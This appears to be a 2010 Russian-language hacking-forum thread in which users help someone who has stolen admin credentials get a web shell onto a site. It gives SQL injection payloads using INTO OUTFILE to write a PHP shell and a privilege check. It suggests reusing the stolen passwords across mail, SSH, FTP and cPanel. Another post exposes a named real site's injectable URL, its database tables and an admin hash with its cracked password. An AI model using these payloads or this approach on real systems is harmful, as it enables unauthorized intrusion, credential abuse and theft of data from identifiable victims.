HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15241  
Старый 06.10.2010, 03:57
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от GroM88  
GroM88 said:
мб как то можно залить шел с помощью sql запроса?
для этого ты должен иметь права на запись и знать локальный путь до сайта.

чтобы узнать есть ли права, используй запрос

UNION SELECT File_Priv from mysql.user

если в ответ получишь Y, то права есть.

чтобы найти путь, попытайся вывести какую-нибудь ошибку, например через тот же sql запрос. или просмотри базу на наличие каких-нибудь конфигов. в них может быть указан путь.

если права будут (в чём я сомневаюсь), и узнаешь путь, используй след. запрос для залития шелла:

UNION SELECT 'шелл' from mysql.user into outfile 'путь_до_сайта/shell.php'
 
Ответить с цитированием

  #15242  
Старый 06.10.2010, 06:47
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

Цитата:
Сообщение от GroM88  
GroM88 said:
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?
кроме совета d1v попробуй эти логины пароли к mail/pma/ssh/ftp/cpanel/etc...
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #15243  
Старый 06.10.2010, 07:09
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

Цитата:
Сообщение от pinch  
pinch said:
http://www.yakutproekt.ru/news.php?id=14517'
вот это надо ....
БД

Цитата:
Сообщение от None  
master
tempdb
model
msdb
telecom
zaokolmi
zags
р–master
Таблы с БД zaokolmi

Цитата:
Сообщение от None  
dtproperties
foto_catalog
auto_catalog
admin
pwd name

009091b3166dcbe1aa6202a97bcda08a zao

пароль от хеша 123456 вроде

Сайты на сервере(ReverseIP): больше 50

кстати там можно и rdp поднять если прав хватит... завтра поковыряюсь.
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #15244  
Старый 06.10.2010, 09:26
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530

Репутация: 54
По умолчанию

shell_code плиииз запросы в личку
 
Ответить с цитированием

  #15245  
Старый 06.10.2010, 18:48
swat_
Новичок
Регистрация: 04.11.2009
Сообщений: 4
Провел на форуме:
233049

Репутация: 0
По умолчанию

Цитата:
Сообщение от GroM88  
GroM88 said:
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?
site?id=-1' UNION SELECT 1,2,3,'',5,6 INTO OUTFILE '1.php' --

Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php.

и да Требуются привилегии FILE
 
Ответить с цитированием

  #15246  
Старый 06.10.2010, 19:35
tracy
Познающий
Регистрация: 24.03.2009
Сообщений: 54
Провел на форуме:
333485

Репутация: 13
По умолчанию

Цитата:
Сообщение от GroM88  
GroM88 said:
Выдрал лоигины и пассы админов на отдном сайте...
Попал в админку) в админке написанно Extasy CMS for site.ru
Нужно как то залить шелл, все что там нашол, это то что можно выполнить sql запрос
и доступен html
мб как то можно залить шел с помощью sql запроса?
Почитай (Заливка шелла через MYSQL)
 
Ответить с цитированием

  #15247  
Старый 06.10.2010, 20:45
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

а d1v что написал то ? =\
__________________
Никогда не бойся делать то, что ты не умеешь. Помни, ковчег был построен любителем. "Титаник" - проффесионалами.
 
Ответить с цитированием

  #15248  
Старый 07.10.2010, 02:42
nemans
Новичок
Регистрация: 03.12.2006
Сообщений: 24
Провел на форуме:
177837

Репутация: 7
По умолчанию

Подскажите программку сканирования и сохранения заданного диапазона интернет странц на сайте, например есть сайт http://site.com?112 и http://site.com?5000 можно ли отсканировать заданный диапазон с записью результатов, ссори если наивный вопрос.
 
Ответить с цитированием

  #15249  
Старый 07.10.2010, 03:07
AdDa
Новичок
Регистрация: 19.01.2007
Сообщений: 1
Провел на форуме:
156305

Репутация: 5
По умолчанию

Что в вашем понимании "отсканировать"? Вообще скрипт нужно сделать (мне по душе перл).
 
Ответить с цитированием

  #15250  
Старый 07.10.2010, 10:51
high_rez
Новичок
Регистрация: 23.08.2009
Сообщений: 1
Провел на форуме:
21192

Репутация: 0
По умолчанию

Ужасно глупый вопрос.

Если я пытаюсь найти XSS и вдруг мой браузер говорит мне, что обнаружена попытка проведения XSS атаки, это значит, что я все таки нашел что то и мой браузер это заблокировал и выдал сообщение?

В моем браузере отключены скритпы.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ